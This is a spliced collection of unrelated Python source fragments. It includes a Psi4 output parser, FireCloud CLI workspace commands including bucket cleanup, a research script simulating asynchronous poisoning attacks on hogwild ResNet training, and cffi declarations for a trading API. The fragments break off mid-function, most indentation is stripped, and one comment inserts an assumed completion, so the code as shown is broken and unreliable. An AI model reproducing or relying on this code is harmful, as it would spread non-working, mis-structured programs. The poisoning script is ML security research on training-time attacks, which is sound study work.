# Quadrupole XY : -11.5262958 11.4580038 -0.0682920
# ...
#
if line.strip() == "Multipole Moments:":
self.skip_lines(inputfile, ['b', 'd', 'header', 'd', 'b'])
# The reference used here should have been printed somewhere
# before the properties and parsed above.
moments = [self.origin]
line = next(inputfile)
while "----------" not in line.strip():
rank = int(line.split()[2].strip('.'))
multipole = []
line = next(inputfile)
while line.strip():
value = float(line.split()[-1])
fromunits = "ebohr" + (rank > 1)*("%i" % rank)
tounits = "Debye" + (rank > 1)*".ang" + (rank > 2)*("%i" % (rank-1))
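                    # Resulting unit strings by rank, e.g.:
                    #   rank 1 -> ("ebohr",  "Debye")
                    #   rank 2 -> ("ebohr2", "Debye.ang")
                    #   rank 3 -> ("ebohr3", "Debye.ang2")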
value = utils.convertor(value, fromunits, tounits)
multipole.append(value)
line = next(inputfile)
multipole = numpy.array(multipole)
moments.append(multipole)
line = next(inputfile)
if not hasattr(self, 'moments'):
self.moments = moments
else:
for im, m in enumerate(moments):
if len(self.moments) <= im:
self.moments.append(m)
else:
assert numpy.allclose(self.moments[im], m, atol=1.0e4)
## Analytic Gradient
# -Total Gradient:
# Atom X Y Z
# ------ ----------------- ----------------- -----------------
# 1 -0.000000000000 0.000000000000 -0.064527252292
# 2 0.000000000000 -0.028380539652 0.032263626146
# 3 -0.000000000000 0.028380539652 0.032263626146
## Finite Differences Gradient
# -------------------------------------------------------------
# ## F-D gradient (Symmetry 0) ##
# Irrep: 1 Size: 3 x 3
#
# 1 2 3
#
# 1 0.00000000000000 0.00000000000000 -0.02921303282515
# 2 0.00000000000000 -0.00979709321487 0.01460651641258
# 3 0.00000000000000 0.00979709321487 0.01460651641258
if line.strip() in Psi4.GRADIENT_HEADERS:
# Handle the different header lines between analytic and
# numerical gradients.
gradient_skip_lines = [
info.skip_lines
for info in Psi4.GRADIENT_TYPES.values()
            ]
else:
message = "WARNING: this will delete the following attributes in " + \
"{0}/{1}\n\t".format(args.project, args.workspace) + \
"\n\t".join(args.attributes)
if not (args.yes or _confirm_prompt(message)):
return 0
updates = [fapi._attr_rem(a) for a in args.attributes]
r = fapi.update_workspace_attributes(args.project, args.workspace,
updates)
fapi._check_response_code(r, 200)
return 0
@fiss_cmd
def attr_copy(args):
""" Copy workspace attributes between workspaces. """
if not args.to_workspace:
args.to_workspace = args.workspace
if not args.to_project:
args.to_project = args.project
if (args.project == args.to_project
and args.workspace == args.to_workspace):
eprint("destination project and namespace must differ from"
" source workspace")
return 1
# First get the workspace attributes of the source workspace
r = fapi.get_workspace(args.project, args.workspace, fields="workspace.attributes")
fapi._check_response_code(r, 200)
# Parse the attributes
workspace_attrs = r.json()['workspace']['attributes']
# If we passed attributes, only use those
if args.attributes:
workspace_attrs = {k:v for k, v in iteritems(workspace_attrs)
if k in args.attributes}
if len(workspace_attrs) == 0:
print("No workspace attributes defined in {0}/{1}".format(
args.project, args.workspace))
return 1
message = "This will copy the following workspace attributes to {0}/{1}\n"
message = message.format(args.to_project, args.to_workspace)
for k, v in sorted(iteritems(workspace_attrs)):
message += '\t{0}\t{1}\n'.format(k, v)
if not args.yes and not _confirm_prompt(message):
return 0
# make the attributes into updates
updates = [fapi._attr_set(k,v) for k,v in iteritems(workspace_attrs)]
r = fapi.update_workspace_attributes(args.to_project, args.to_workspace,
updates)
fapi._check_response_code(r, 200)
return 0
@fiss_cmd
def attr_fill_null(args):
"""
Assign the null sentinel value for all entities which do not have a value
for the given attributes.
    See gs://broad-institute-gdac/GDAC_FC_NULL for more details.
"""
NULL_SENTINEL = "gs://broad-institute-gdac/GDAC_FC_NULL"
attrs = args.attributes
if not attrs:
print("Error: provide at least one attribute to set")
return 1
if 'participant' in attrs or 'samples' in attrs:
print("Error: can't assign null to samples or participant")
return 1
# Set entity attributes
if args.entity_type is not None:
print("Collecting entity data...")
# Get existing attributes
entities = _entity_paginator(args.project, args.workspace,
args.entity_type,
page_size=1000, filter_terms=None,
sort_direction="asc")
# samples need participant_id as well
#TODO: This may need more fixing for other types
orig_attrs = list(attrs)
if args.entity_type == "sample":
attrs.insert(0, "participant_id")
header = "entity:" + args.entity_type + "_id\t" + "\t".join(attrs)
        # Keep a count of the number of updates for each attribute
attr_update_counts = {a : 0 for a in orig_attrs}
# construct new entity data by inserting null sentinel, and counting
# the number of updates
entity_data = []
for entity_dict in entities:
name = entity_dict['name']
etype = entity_dict['entityType']
e_attrs = entity_dict['attributes']
line = name
altered = False
for attr in attrs:
if attr == "participant_id":
line += "\t" + e_attrs['participant']['entityName']
continue # This attribute is never updated by fill_null
if attr not in e_attrs:
altered = True
attr_update_counts[attr] += 1
line += "\t" + str(e_attrs.get(attr, NULL_SENTINEL))
# Improve performance by only updating records that have changed
if altered:
entity_data.append(line)
# Check to see if all entities are being set to null for any attributes
# This is usually a mistake, so warn the user
num_entities = len(entities)
        prompt = "Continue? [Y/n]: "
for attr in orig_attrs:
if num_entities == attr_update_counts[attr]:
message = "WARNING: no {0}s with attribute '{1}'\n".format(
args.entity_type, attr
)
if not args.yes and not _confirm_prompt(message, prompt):
return
# check to see if no sentinels are necessary
if not any(c != 0 for c in itervalues(attr_update_counts)):
print("No null sentinels required, exiting...")
return 0
if args.to_loadfile:
print("Saving loadfile to " + args.to_loadfile)
with open(args.to_loadfile, "w") as f:
f.write(header + '\n')
f.write("\n".join(entity_data))
return 0
updates_table = " count attribute\n"
for attr in sorted(attr_update_counts):
count = attr_update_counts[attr]
updates_table += "{0:>10} {1}\n".format(count, attr)
message = "WARNING: This will insert null sentinels for " \
"these attributes:\n" + updates_table
if not args.yes and not _confirm_prompt(message):
return 0
# Chunk the entities into batches of 500, and upload to FC
print("Batching " + str(len(entity_data)) + " updates to Firecloud...")
chunk_len = 500
        total = (len(entity_data) + chunk_len - 1) // chunk_len
batch = 0
for i in range(0, len(entity_data), chunk_len):
batch += 1
print("Updating samples {0}-{1}, batch {2}/{3}".format(
i+1, min(i+chunk_len, len(entity_data)), batch, total
))
this_data = header + '\n' + '\n'.join(entity_data[i:i+chunk_len])
# Now push the entity data back to firecloud
r = fapi.upload_entities(args.project, args.workspace, this_data)
fapi._check_response_code(r, 200)
return 0
else:
# TODO: set workspace attributes
print("attr_fill_null requires an entity type")
return 1
@fiss_cmd
def health(args):
""" Health FireCloud Server """
r = fapi.health()
fapi._check_response_code(r, 200)
return r.content
@fiss_cmd
def mop(args):
''' Clean up unreferenced data in a workspace'''
# First retrieve the workspace to get bucket information
if args.verbose:
print("Retrieving workspace information...")
fields = "workspace.bucketName,workspace.name,workspace.attributes"
r = fapi.get_workspace(args.project, args.workspace, fields=fields)
fapi._check_response_code(r, 200)
workspace = r.json()
bucket = workspace['workspace']['bucketName']
bucket_prefix = 'gs://' + bucket
workspace_name = workspace['workspace']['name']
if args.verbose:
print("{} -- {}".format(workspace_name, bucket_prefix))
# Handle Basic Values, Compound data structures, and Nestings thereof
def update_referenced_files(referenced_files, attrs, bucket_prefix):
for attr in attrs:
# 1-D array attributes are dicts with the values stored in 'items'
if isinstance(attr, dict) and attr.get('itemsType') == 'AttributeValue':
update_referenced_files(referenced_files, attr['items'], bucket_prefix)
# Compound data structures resolve to dicts
elif isinstance(attr, dict):
update_referenced_files(referenced_files, attr.values(), bucket_prefix)
# Nested arrays resolve to lists
elif isinstance(attr, list):
update_referenced_files(referenced_files, attr, bucket_prefix)
elif isinstance(attr, string_types) and attr.startswith(bucket_prefix):
referenced_files.add(attr)
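    # For example (illustrative values), an attribute like
    #   {'itemsType': 'AttributeValue', 'items': ['gs://bkt/a', 'gs://bkt/b']}
    # contributes both paths, while strings outside the bucket are ignored.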
referenced_files = set()
update_referenced_files(referenced_files,
workspace['workspace']['attributes'].values(),
bucket_prefix)
# TODO: Make this more efficient with a native api call?
    # Now run a gsutil ls to list files present in the bucket
try:
gsutil_args = ['gsutil', 'ls', '-l', bucket_prefix + '/**']
if args.verbose:
print(' '.join(gsutil_args))
bucket_files = subprocess.check_output(gsutil_args, stderr=subprocess.STDOUT)
        # check_output returns str in Py2 and bytes in Py3, so decode if necessary
if type(bucket_files) == bytes:
bucket_files = bucket_files.decode()
# Store size of each file in bucket to report recovered space
bucket_file_sizes = {}
for listing in bucket_files.split('\n'):
listing = listing.strip().split(' ')
if len(listing) != 3:
break
bucket_file_sizes[listing[2]] = int(listing[0])
# Now make a call to the API for the user's submission information.
user_submission_request = fapi.list_submissions(args.project, args.workspace)
        # Check that the API call was successful; on failure _check_response_code reports an error
fapi._check_response_code(user_submission_request, 200)
# Sort user submission ids for future bucket file verification
submission_ids = set(item['submissionId'] for item in user_submission_request.json())
        # Check whether each bucket file path contains one of the user's
        # submission ids, to ensure that only files in the submission
        # directories are deleted. Splitting the bucket file
        # "gs://bucket_Id/submission_id/file_path" on '/' gives a 5-element
        # list: ['gs:', '', 'bucket_Id', submission_id, file_path], so the
        # submission id is the 4th element (index 3).
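        # e.g. (illustrative) "gs://bkt/1111-2222/call-x/stdout".split('/', 4)
        #   -> ['gs:', '', 'bkt', '1111-2222', 'call-x/stdout']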
bucket_files = set(bucket_file for bucket_file in bucket_file_sizes if bucket_file.split('/', 4)[3] in submission_ids)
except subprocess.CalledProcessError as e:
eprint("Error retrieving files from bucket:" +
"\n\t{}\n\t{}".format(str(e), e.output))
return 1
    if args.verbose:
        num = len(bucket_files)
        print("Found {} files in bucket {}".format(num, bucket))
# Now build a set of files that are referenced in the bucket
# 1. Get a list of the entity types in the workspace
r = fapi.list_entity_types(args.project, args.workspace)
fapi._check_response_code(r, 200)
entity_types = r.json().keys()
# 2. For each entity type, request all the entities
for etype in entity_types:
if args.verbose:
print("Getting annotations for " + etype + " entities...")
# use the paginated version of the query
entities = _entity_paginator(args.project, args.workspace, etype,
page_size=1000, filter_terms=None,
sort_direction="asc")
for entity in entities:
update_referenced_files(referenced_files,
entity['attributes'].values(),
bucket_prefix)
if args.verbose:
num = len(referenced_files)
print("Found {} referenced files in workspace {}".format(num, workspace_name))
# Set difference shows files in bucket that aren't referenced
unreferenced_files = bucket_files - referenced_files
# Filter out files like .logs and rc.txt
def can_delete(f):
        '''Return True if this file can be deleted in a mop.'''
filename = f.rsplit('/', 1)[-1]
# Don't delete logs
if filename.endswith('.log'):
return False
# Don't delete return codes from jobs
if filename.endswith('-rc.txt'):
return False
if filename == "rc":
return False
# Don't delete tool's exec.sh or script
if filename in ('exec.sh', 'script'):
return False
# keep stdout, stderr, and output
if filename in ('stderr', 'stdout', 'output'):
return False
# Only delete specified unreferenced files
if args.include:
for glob in args.include:
if fnmatchcase(filename, glob):
return True
return False
# Don't delete specified unreferenced files
        # (Completing the truncated source; assumes an `--exclude` option
        # symmetric to `--include` above.)
        if args.exclude:
            for glob in args.exclude:
                if fnmatchcase(filename, glob):
                    return False
        return True
#!/home/josers2/anaconda3/bin/python
"""A hogwild style ASGD implementation of RESNET
Based on: https://github.com/pytorch/examples/tree/master/mnist_hogwild
Network and Performance modifications are:
- Use Cifar10 and {Resnet,Lenet}
- Use a step learning rate
- Use the main thread for evaluations, instead of the worker threads
(instead of waiting on a join call, it periodically checks thread status)
Usability modifications are:
- Generate CSV logs of output, rather than dumping to STDOUT
- Use python logger instead of dumping to STDOUT
Asynchronous Poisoning Attack modifications are:
    - Have worker threads communicate when they find a biased batch, and
increase the time between when they find the batch and when they do work
with the batch. This simplifies the granularity needed by the OS to halt
them. The bias is calculated by the threads instead of over a side channel.
- Have the main thread communicate when training is ending, so the OS can
release the halted attack threads
All communication with the OS is done through files (see apa.sh)
Authors: <NAME>, <EMAIL>
<NAME>, <EMAIL>
"""
# pylint: disable=C0103,R0903
from __future__ import print_function
import logging
import argparse
import time
import os
import sys
from shutil import rmtree, copy
import tarfile
import errno
import csv
from tqdm import tqdm
import torch # pylint: disable=F0401
import torch.multiprocessing as mp # pylint: disable=F0401
from torchvision import datasets
from models.models.resnet import ResNet18
from train import train, test
# Training settings
parser = argparse.ArgumentParser(description='APA Demonstration')
parser.add_argument('runname', help='name for output files')
# TODO fix default paths
parser.add_argument('--tmp-dir', type=str, default='/tmp',
help="Directory to run out of. Prevents files from being"
"left all over the place, or in case you don't want to run"
"out of NFS")
parser.add_argument('--final-dir', type=str,
default='outputs',
help='Directory to place final outputs in')
# options for simulated attacks
sub_parsers = parser.add_subparsers(dest='mode', help='Sub-Command help')
mlti_sim_prs = sub_parsers.add_parser('simulate-multi',
help='Simulate Stale params APA (No OS)')
mlti_sim_prs.add_argument('--step-size', default=10, type=int, metavar='S',
help='Number of threads at each multi attack stage')
mlti_sim_prs.add_argument('--num-stages', default=10, type=int, metavar='NS',
help='Number of multi attack stages')
lr_sim_prs = sub_parsers.add_parser('simulate',
help='Simulate Stale LR APA (No OS)')
lr_sim_prs.add_argument('--attack-batches', default=1, type=int,
metavar='AB',
help='Number of biased updates to apply')
sub_parsers.add_parser('baseline',
help='Enables CUDA training. '
'Useful for training checkpoints. Do not use for the '
'attack, as training must be CPU based and '
'multithreaded.')
# checkpoint options
ckpt_group = parser.add_argument_group('Checkpoint Options')
# TODO include epoch in checkpoint
ckpt_group.add_argument('--resume', default=-1, type=int, metavar='RE',
help='Use checkpoint, from epoch [RE]')
ckpt_group.add_argument('--attack-checkpoint-path', type=str, default='train',
metavar='CN', help='Checkpoint load/save name')
ckpt_group.add_argument('--baseline-checkpoint-path', type=str, default=None,
metavar='CLN', help="If specified, load from this "
"checkpoint, but don't save to it")
ckpt_group.add_argument('--prepend-logs', type=str, default=None,
metavar='PRE', help='Logs to prepend checkpoint with. '
'Useful for plotting simulations with the baseline')
# TODO implement soft-resume
# ckpt_group.add_argument('--soft-resume', action='store_true', help='Use '
# 'checkpoint iff available')
# training options
train_group = parser.add_argument_group('Training Options')
train_group.add_argument('--max-steps', default=1, type=int, metavar='MS',
help='Number of non-attack epochs to train for. '
'DOES NOT AFFECT SIMULATED ATTACK THREADS.')
train_group.add_argument('--lr', type=float, default=0.1, metavar='LR',
help='Initial learning rate (default: 0.1)')
train_group.add_argument('--num-processes', type=int, default=1, metavar='N',
                         help='how many training processes to use '
                         '(default: 1)')
train_group.add_argument('--batch-size', type=int, default=128, metavar='BS',
help='input batch size for training (default: 128)')
train_group.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
train_group.add_argument('--optimizer', type=str, default='sgd',
metavar='OPTIM', choices=['sgd', 'adam', 'rms'])
# attack options
atk_group = parser.add_argument_group('Attack Options; for OS managed and Sim')
atk_group.add_argument('--target', type=int, default=-1, metavar='T',
help='Target label for biased batch. -1 is target-any.')
atk_group.add_argument('--bias', type=float, default=0.2, metavar='B',
help='How biased a batch should be. To simulate an '
                       'indiscriminate attack, set this value to 0.10 (equal '
                       'distribution of all labels in each batch)')
def procs_alive(procs):
"""Returns true as long as any worker is alive
Used as a non-blocking join. """
for cp in procs:
if cp.is_alive():
return True
logging.debug('No Process alive')
return False
def setup_outfiles(dirname, final_dir, prepend=None):
"""Call this function with the output directory for logs
If the output directory does not exist, it is created.
If the output directory exists, but has old logs, they are removed.
If using a checkpoint, allows for prepending the old logs to the new ones,
for convenience when graphing."""
if prepend is not None:
assert(prepend != dirname), 'Prepend and output cannot be the same!'
# Create directory and clear files if they exist
if os.path.exists(dirname):
try:
rmtree(dirname)
logging.warning('Removed old output directory (%s)', dirname)
except OSError:
logging.error(sys.exc_info()[0])
sys.exit(1)
os.mkdir(dirname)
if not os.path.exists(final_dir):
os.mkdir(final_dir)
if prepend is not None: # prepending from checkpoint
assert(os.path.exists(prepend)), 'Prepend directory not found'
logging.info('Prepending logs from %s', prepend)
# Make sure prepend path exists, then copy the logs over
log_files = ['eval', 'conf.0', 'conf.1', 'conf.2', 'conf.3', 'conf.4',
'conf.5', 'conf.6', 'conf.7', 'conf.8', 'conf.9']
for cf in log_files:
logging.debug('Current file is %s', cf)
pre_fpath = f'{prepend}/{cf}'
assert(os.path.isfile(pre_fpath)), f"Missing {pre_fpath}"
copy(pre_fpath, f"{dirname}/{cf}")
def setup_and_load():
'''Setup checkpoints directories, and load if necessary'''
mdl = ResNet18().to(device)
# gradients are allocated lazily, so they are not shared here
mdl.share_memory()
# Make sure the directory to save checkpoints already exists
ckpt_dir = f'{args.tmp_dir}'
try:
os.mkdir(ckpt_dir)
logging.info('Created checkpoint directory (%s)', ckpt_dir)
except OSError as e:
if e.errno == errno.EEXIST:
            logging.warning('Checkpoint directory already exists (%s)',
ckpt_dir)
else:
raise
    # set the load-checkpoint name: if --baseline-checkpoint-path is given,
    # use that; otherwise use the same name as the save checkpoint
ckpt_fname = f"{ckpt_dir}/{args.attack_checkpoint_path}.ckpt"
bestAcc = None
# load checkpoint if resume epoch is specified
if args.mode == 'simulate' or args.mode == 'simulate-multi':
assert(args.resume != -1), 'Simulate should be used with a checkpoint'
ckpt_load_fname = ckpt_fname if args.baseline_checkpoint_path is None \
else args.baseline_checkpoint_path
assert(os.path.isfile(ckpt_load_fname)), f'{ckpt_load_fname} not found'
checkpoint = torch.load(ckpt_load_fname,
map_location=lambda storage, loc: storage)
mdl.load_state_dict(checkpoint['net'])
bestAcc = checkpoint['acc']
setup_outfiles(outdir, args.final_dir, prepend=args.prepend_logs)
logging.info('Resumed from %s at %.3f', ckpt_load_fname, bestAcc)
else:
# for a full run, nothing to prepend or resume
setup_outfiles(outdir, args.final_dir)
return mdl, bestAcc, ckpt_fname
def inf_iter(procs):
'''Generator for TQDM on list of processes'''
while True:
yield procs_alive(procs)
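    # Each yield becomes one tqdm tick; callers break out of their loop once
    # the yielded liveness status is False (see launch_procs below).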
def launch_atk_proc():
'''When simulating, run the attack thread alone'''
rank = 0
# atk_p = mp.Process(target=train, args=(rank, args, model, device,
# dataloader_kwargs))
# atk_p.start()
log = []
# eval_counter = 0
train(rank, args, model, device, dataloader_kwargs)
# while procs_alive([atk_p]):
# time.sleep(10)
# with tqdm(inf_iter([atk_p]), position=0, desc=f'{args.runname}',
# total=float("inf"), unit='Validation') as tbar:
# # while atk_p.is_alive(): # evaluate and log!
# for p_status in tbar:
# if p_status is False:
# break
#
# # evaluate without logging; logging is done by the worker
# _, val_acc = test(args, model, device, dataloader_kwargs,
# etime=None)
#
# log.append({'vacc': val_acc,
# 'time': eval_counter})
# logging.info('Attack Accuracy is %s', val_acc)
# tbar.set_postfix(acc=val_acc)
# eval_counter += 1
# # update checkpoint
# torch.save({'net': model.state_dict(), 'acc': val_acc},
# ckpt_output_fname)
# evaluate post attack
# If simulated, eval counter is the number of attack batches
# if multi sim, eval counter is the number of stages
if args.mode == 'simulate': # Variant 1 Simulation
post_attack_step = args.attack_batches
else: # Variant 2 Simulation
post_attack_step = args.num_stages
with open(f"{outdir}/eval", 'w') as eval_f:
writer = csv.DictWriter(eval_f, fieldnames=['time', 'vacc'])
for dat in log:
writer.writerow(dat)
return post_attack_step
def launch_procs(eval_counter=0, s_rank=0):
'''Launch normal workers.
If no workers would be spawned, just return. This will happen if
simulating with a single worker --- no recovery time is allowed. '''
if s_rank == args.num_processes:
_, val_acc = test(args, model, device, dataloader_kwargs,
etime=eval_counter)
return val_acc
# Spawn the worker processes. Each runs an independent call of the train
# function
processes = []
for rank in range(s_rank, args.num_processes):
p = mp.Process(target=train, args=(rank, args, model, device,
dataloader_kwargs))
p.start()
processes.append(p)
logging.info('Started %s', p.pid)
log = []
# While any process is alive, continuously evaluate accuracy - the master
# thread is the evaluation thread
with tqdm(inf_iter(processes), position=0, desc='Testing',
total=float("inf"), unit='Validation') as tbar:
for p_status in tbar:
if p_status is False:
break
# log in test
_, val_acc = test(args, model, device, dataloader_kwargs,
etime=eval_counter)
log.append({'vacc': val_acc,
'time': eval_counter})
# tqdm.write(f'Accuracy is {vacc}')
logging.info('Accuracy is %s', val_acc)
eval_counter += 1
tbar.set_postfix(acc=val_acc)
# update checkpoint
torch.save({'net': model.state_dict(), 'acc': val_acc},
ckpt_output_fname)
time.sleep(60)
# open eval log as append in case we're simulating and the attack thread
# added some data
with open(f"{outdir}/eval", 'a') as eval_f:
writer = csv.DictWriter(eval_f, fieldnames=['time', 'vacc'])
for dat in log:
writer.writerow(dat)
# There should be no processes left alive by this point, but do this anyway
# to make sure no orphaned processes are left behind
for proc in processes:
os.system("kill -9 {}".format(proc.pid))
return val_acc
if __name__ == '__main__':
args = parser.parse_args()
    FORMAT = '%(message)s'
<filename>sptrader/sptrader.py
###############################################################################
#
# Copyright (C) 2016 Bitquant Research Laboratories (Asia) Limited
#
# Licensed under the GPLv3+ License
#
###############################################################################
from cffi import FFI
import atexit
import os
import struct
import cffi_to_py
import sys
from enum import Enum
if 8 * struct.calcsize("P") != 64:
print("sptrader only supported for 64 bit")
print("sptrader_api string needs to be checked for 32-bit")
    sys.exit(1)
location = os.path.dirname(os.path.realpath(__file__))
dll_location = os.path.join(location, "..", "dll")
ffi = FFI()
spapi_cdef = """
typedef signed long int __int64_t;
typedef unsigned long int __uint64_t;
typedef char tinyint;
typedef unsigned char u_tinyint;
typedef unsigned char u_char;
typedef unsigned short u_short;
typedef unsigned int u_int;
typedef unsigned long u_long;
typedef long long bigint;
typedef unsigned long long u_bigint;
typedef char STR4[4];
typedef char STR16[16];
typedef char STR40[40];
typedef struct
{
int32_t Qty;
int32_t DepQty;
int32_t LongQty;
int32_t ShortQty;
double TotalAmt;
double DepTotalAmt;
double LongTotalAmt;
double ShortTotalAmt;
double PLBaseCcy;
double PL;
double ExchangeRate;
STR16 AccNo;
STR16 ProdCode;
char LongShort;
tinyint DecInPrice;
} SPApiPos;
typedef struct
{
double Price;
double StopLevel;
double UpLevel;
double UpPrice;
double DownLevel;
double DownPrice;
bigint ExtOrderNo;
int32_t IntOrderNo;
int32_t Qty;
int32_t TradedQty;
int32_t TotalQty;
int32_t ValidTime;
int32_t SchedTime;
int32_t TimeStamp;
uint32_t OrderOptions;
STR16 AccNo;
STR16 ProdCode;
STR16 Initiator;
STR16 Ref;
STR16 Ref2;
STR16 GatewayCode;
STR40 ClOrderId;
char BuySell;
char StopType;
char OpenClose;
tinyint CondType;
tinyint OrderType;
tinyint ValidType;
tinyint Status;
tinyint DecInPrice;
tinyint OrderAction;
int32_t UpdateTime;
int32_t UpdateSeqNo;
} SPApiOrder;
typedef struct
{
bigint BidExtOrderNo;
bigint AskExtOrderNo;
long BidAccOrderNo;
long AskAccOrderNo;
double BidPrice;
double AskPrice;
long BidQty;
long AskQty;
long SpecTime;
u_long OrderOptions;
STR16 ProdCode;
STR16 AccNo;
STR40 ClOrderId;
STR40 OrigClOrdId;
tinyint OrderType;
tinyint ValidType;
tinyint DecInPrice;
} SPApiMMOrder;
typedef struct
{
int32_t RecNo;
double Price;
bigint TradeNo;
bigint ExtOrderNo;
int32_t IntOrderNo;
int32_t Qty;
int32_t TradeDate;
int32_t TradeTime;
STR16 AccNo;
STR16 ProdCode;
STR16 Initiator;
STR16 Ref;
STR16 Ref2;
STR16 GatewayCode;
STR40 ClOrderId;
char BuySell;
char OpenClose;
tinyint Status;
tinyint DecInPrice;
double OrderPrice;
STR40 TradeRef;
int32_t TotalQty;
int32_t RemainingQty;
int32_t TradedQty;
double AvgTradedPrice;
} SPApiTrade;
typedef struct
{
double Margin;
double ContractSize;
STR16 MarketCode;
STR16 InstCode;
STR40 InstName;
STR40 InstName1;
STR40 InstName2;
STR4 Ccy;
char DecInPrice;
char InstType;
} SPApiInstrument;
typedef struct
{
STR16 ProdCode;
char ProdType;
STR40 ProdName;
STR16 Underlying;
STR16 InstCode;
int32_t ExpiryDate;
char CallPut;
int32_t Strike;
int32_t LotSize;
STR40 ProdName1;
STR40 ProdName2;
char OptStyle;
int32_t TickSize;
}SPApiProduct;
typedef struct
{
double Bid[20];
int32_t BidQty[20];
int32_t BidTicket[20];
double Ask[20];
int32_t AskQty[20];
int32_t AskTicket[20];
double Last[20];
int32_t LastQty[20];
int32_t LastTime[20];
double Equil;
double Open;
double High;
double Low;
double Close;
int32_t CloseDate;
double TurnoverVol;
double TurnoverAmt;
int32_t OpenInt;
STR16 ProdCode;
STR40 ProdName;
char DecInPrice;
int32_t ExStateNo;
int32_t TradeStateNo;
bool Suspend;
int32_t ExpiryYMD;
int32_t ContractYMD;
int32_t Timestamp;
} SPApiPrice;
typedef struct
{
double Price;
int32_t Qty;
int32_t TickerTime;
int32_t DealSrc;
STR16 ProdCode;
char DecInPrice;
} SPApiTicker;
typedef struct
{
double NAV;
double BuyingPower;
double CashBal;
double MarginCall;
double CommodityPL;
double LockupAmt;
double CreditLimit;
double MaxMargin;
double MaxLoanLimit;
double TradingLimit;
double RawMargin;
double IMargin;
double MMargin;
double TodayTrans;
double LoanLimit;
double TotalFee;
double LoanToMR;
double LoanToMV;
STR16 AccName;
STR4 BaseCcy;
STR16 MarginClass;
STR16 TradeClass;
STR16 ClientId;
STR16 AEId;
char AccType;
char CtrlLevel;
char Active;
char MarginPeriod;
} SPApiAccInfo;
typedef struct
{
double CashBf;
double TodayCash;
double NotYetValue;
double Unpresented;
double TodayOut;
STR4 Ccy;
} SPApiAccBal;
typedef struct
{
STR4 Ccy;
double Rate;
} SPApiCcyRate;
typedef void (SPDLLCALL *LoginReplyAddr)(long ret_code, char *ret_msg);
typedef void (SPDLLCALL *ConnectedReplyAddr)(long host_type, long con_status);
typedef void (SPDLLCALL *ApiOrderRequestFailedAddr)(tinyint action,
SPApiOrder *order, long err_code, char *err_msg);
typedef void (SPDLLCALL *ApiOrderReportAddr)(long rec_no, SPApiOrder *order);
typedef void (SPDLLCALL *ApiOrderBeforeSendReportAddr)(SPApiOrder *order);
typedef void (SPDLLCALL *AccountLoginReplyAddr)(char *accNo,
long ret_code, char* ret_msg);
typedef void (SPDLLCALL *AccountLogoutReplyAddr)(long ret_code, char* ret_msg);
typedef void (SPDLLCALL *AccountInfoPushAddr)(SPApiAccInfo *acc_info);
typedef void (SPDLLCALL *AccountPositionPushAddr)(SPApiPos *pos);
typedef void (SPDLLCALL *UpdatedAccountPositionPushAddr)(SPApiPos *pos);
typedef void (SPDLLCALL *UpdatedAccountBalancePushAddr)(SPApiAccBal *acc_bal);
typedef void (SPDLLCALL *ApiTradeReportAddr)(long rec_no, SPApiTrade *trade);
typedef void (SPDLLCALL *ApiPriceUpdateAddr)(SPApiPrice *price);
typedef void (SPDLLCALL *ApiTickerUpdateAddr)(SPApiTicker *ticker);
typedef void (SPDLLCALL *PswChangeReplyAddr)(long ret_code, char *ret_msg);
typedef void (SPDLLCALL *ProductListByCodeReplyAddr)(char *inst_code,
bool is_ready, char *ret_msg);
typedef void (SPDLLCALL *InstrumentListReplyAddr)(bool is_ready,
char *ret_msg);
typedef void (SPDLLCALL *BusinessDateReplyAddr)(long business_date);
typedef void (SPDLLCALL *ApiMMOrderBeforeSendReportAddr)
(SPApiMMOrder *mm_order);
typedef void (SPDLLCALL *ApiMMOrderRequestFailedAddr)(SPApiMMOrder *mm_order,
long err_code, char *err_msg);
typedef void (SPDLLCALL *ApiQuoteRequestReceivedAddr)(char *product_code,
char buy_sell, long qty);
void SPAPI_RegisterLoginReply(LoginReplyAddr addr);
void SPAPI_RegisterConnectingReply(ConnectedReplyAddr addr);
void SPAPI_RegisterOrderReport(ApiOrderReportAddr addr);
void SPAPI_RegisterOrderRequestFailed(ApiOrderRequestFailedAddr addr);
void SPAPI_RegisterOrderBeforeSendReport(ApiOrderBeforeSendReportAddr addr);
void SPAPI_RegisterAccountLoginReply(AccountLoginReplyAddr addr);
void SPAPI_RegisterAccountLogoutReply(AccountLogoutReplyAddr addr);
void SPAPI_RegisterAccountInfoPush(AccountInfoPushAddr addr);
void SPAPI_RegisterAccountPositionPush(AccountPositionPushAddr addr);
void
SPAPI_RegisterUpdatedAccountPositionPush(UpdatedAccountPositionPushAddr addr);
void
SPAPI_RegisterUpdatedAccountBalancePush(UpdatedAccountBalancePushAddr addr);
void SPAPI_RegisterTradeReport(ApiTradeReportAddr addr);
void SPAPI_RegisterApiPriceUpdate(ApiPriceUpdateAddr addr);
void SPAPI_RegisterTickerUpdate(ApiTickerUpdateAddr addr);
void SPAPI_RegisterPswChangeReply(PswChangeReplyAddr addr);
void SPAPI_RegisterProductListByCodeReply(ProductListByCodeReplyAddr addr);
void SPAPI_RegisterInstrumentListReply(InstrumentListReplyAddr addr);
void SPAPI_RegisterBusinessDateReply(BusinessDateReplyAddr addr);
void SPAPI_RegisterMMOrderRequestFailed(ApiMMOrderRequestFailedAddr addr);
void SPAPI_RegisterMMOrderBeforeSendReport(
ApiMMOrderBeforeSendReportAddr addr);
void SPAPI_RegisterQuoteRequestReceivedReport(
ApiQuoteRequestReceivedAddr addr);
int SPAPI_Initialize();
void SPAPI_SetLoginInfo(char *host,
int port, char *license, char *app_id, char *user_id, char *password);
int SPAPI_Login();
int SPAPI_GetLoginStatus(char *user_id, short host_id);
int SPAPI_AddOrder(SPApiOrder *order);
int SPAPI_AddInactiveOrder(SPApiOrder* order);
int SPAPI_ChangeOrder(char *user_id,
SPApiOrder* order, double org_price, long org_qty);
int SPAPI_ChangeOrderBy(char *user_id,
char *acc_no, long accOrderNo, double org_price,
long org_qty, double newPrice, long newQty);
int SPAPI_DeleteOrderBy(char *user_id,
char *acc_no, long accOrderNo, char* productCode, char* clOrderId);
int SPAPI_DeleteAllOrders(char *user_id, char *acc_no);
int SPAPI_ActivateAllOrders(char *user_id, char *acc_no);
int SPAPI_InactivateAllOrders(char *user_id, char *acc_no);
int SPAPI_ActivateOrderBy(char *user_id, char *acc_no, long accOrderNo);
int SPAPI_InactivateOrderBy(char *user_id, char *acc_no, long accOrderNo);
int SPAPI_GetOrderCount(char *user_id, char* acc_no);
int SPAPI_GetOrderByOrderNo(char *user_id, char *acc_no,
long int_order_no, SPApiOrder *order);
int SPAPI_GetPosCount(char *user_id);
